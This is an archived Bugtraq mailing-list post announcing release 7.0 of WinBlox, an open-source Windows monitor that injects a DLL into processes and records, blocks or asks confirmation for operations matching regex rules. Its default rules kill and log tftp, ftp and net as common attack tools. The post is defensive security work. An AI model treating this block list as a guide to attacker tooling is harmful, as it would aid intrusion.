TUCoPS :: Windows Apps :: hack2181.htm

more simple and flexible WinBlox(GET CONTROL OF WINNT SYSTEM)
more simple and flexible WinBlox(GET CONTROL OF WINNT SYSTEM) 

SUBJECT : more simple and flexible WinBlox(GET CONTROL OF WINNT SYSTEM)
TO      : bugtraq and dm@securityfocus.com 
FROM    : Liu Die Yu 

tell me why the following message didn't get thru and there is no notification about rejection.

***** ***** ***** ***** ***** 

expected readers
================
winnt(NT/2K/XP/2K3) users who know state-of-the-art protection(network firewall, anti-virus, code
made by ms) is far from enough.

What is WinBlox
===============
You can understand WinBlox within 15 seconds, while i have spent nearly 3 months on it:
http://umbrella.name/winblox/what_is_winblox.htm 
(Requires Macromedia Flash Plugin)

Current WinBlox
===============
open source and functional. 
but not tested long enough for operational uses yet.
to get up2date info, visit:
http://umbrella.name/winblox 

WinBlox 7.0 Enhancement
=======================

[1/6]USAGE : Get More Simple and Powerful Control
-------------------------------------------------[V]
Software consists of the following 4 files:
one setup program(WBD.EXE) , one monitor DLL(WBM.DLL), one config file(WBLIST.TXT) and one log
file(WBLOG.TXT).
(the log file is not shipped with installation package)

WBD.EXE    :use start/stop/status switch to enable WinBlox, remove WinBlox or check current status
of WinBlox.
WBLIST.TXT :define actions = {record,filter,confirm} to take when operation descriptor regular
expression pattern matches.
the format is:
[action_list][regular_expression_pattern]
("[regular_expression_pattern]" must start with "^")
for example:
record.filter.^.*iexplore.*
(record and kill any operation whose descriptor contains "iexplore")

NOTE: 
"confirm" action will be treated as "filter" on "COMMANDLINE:" operation.
(MessageBox does not work there.)

[2/6]BUGFIX: LNK2005 Error during Compiling WBM(WinBlox Monitor)
----------------------------------------------------------------[V]
Many People reported that the monitor DLL cannot be compiled due to LNK2005 error.
Fixed in this release.

[3/6]SPEED : Faster Regular Expression Matching
-----------------------------------------------[V]
The speed is greatly improved by compiling regex pattern only once.
[+]GREAT Thanks to Oliver Lavery(olavery AT pivx DzeroT com) for suggestion of this improvement.
[QUOTE]
your program will probably be MUCH faster (maybe up to 10x)
[/QUOTE]

[4/6]SPEED : Saved Many "strlen" Calls during Initialization
------------------------------------------------------------[V]
The startup speed of each program is improved by using as few "strlen" as possible.
[+]Thanks to David Boyce(d DzeroT boyce AT ntlworld DzeroT com) for suggestion of this
improvement.

[5/6]SOURCE: Index and Count Clarification
------------------------------------------[V]
replace "// 3" with "// count:3,index:2" 
[+]Thanks David Boyce(d DzeroT boyce AT ntlworld DzeroT com) for suggestion of this improvement.

[6/6]USAGE : Include Username in Operation Descriptor
-----------------------------------------------------[V]
Username is added in the descriptor of CreateFile operation in the following format:
"[Username]@CreateFile:[Full_Filename_Of_EXE] > [Commandline] ==> [AccessType] --> [Target_File]",
[+]Thanks to "Paul Jordison"(pjordison AT tablimited DzeroT com DzeroT au)
[QUOTE]
I have a need to check all operation sources and targets from my CITRIX Servers (for network
security)
[...]
it shows that UserA ran application B and was accessing source C?
[/QUOTE]


Features Still in Wish List
===========================

[1/1]System-wide DLL Injection on Win9x
---------------------------------------[_]
WinBlox can work on Win9x if it's possible to inject WBM.DLL to all processes on Win9x.
But I have not figured out howto yet. 
"Bob Dickinson"(bob AT echeguren DzeroT com) and many others wanted this.
i don't want to turn them down.

Default Config File
===================
Default config file("WBLIST.TXT") does the following things:
#ie needs confirmation to write EXE(unless it's only WRITE_ATTRIBUTES) - including EXE download
and Adodb.Stream writting to EXE
#record any file operation whose target filename contains "\_sensitiVe_\"
#kill and record tftp, ftp and net - too many attacks involve these commandline tools

More Strict for Higer Security
==============================
#Only an account named "WRITEEXE" can issue file operation on EXE file.
#as a side-effect, no icon stored in EXE can be displayed any more.
#kill and record tftp, ftp and net - too many attacks involve these commandline tools

Special Warning: Protect Log File
=================================
For higher security, you need to change the filename of log file("WBLOG.TXT").

To change the filename of log file:
change the value of "LOG_FILEID"(specified by "#define" macro) in the following file:
open\wbm\detours\samples\wbm\wbm.cpp
and re-compile "WBM.DLL".

For more information on compiling, visit the official site:
http://umbrella.name/ 

This WBLIST.TXT file is only included in the "All Source Code and Document" package.

===== END OF FILE =====




	
		
__________________________________
Do you Yahoo!?
SBC Yahoo! - Internet access at a great low price.
http://promo.yahoo.com/sbc/

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH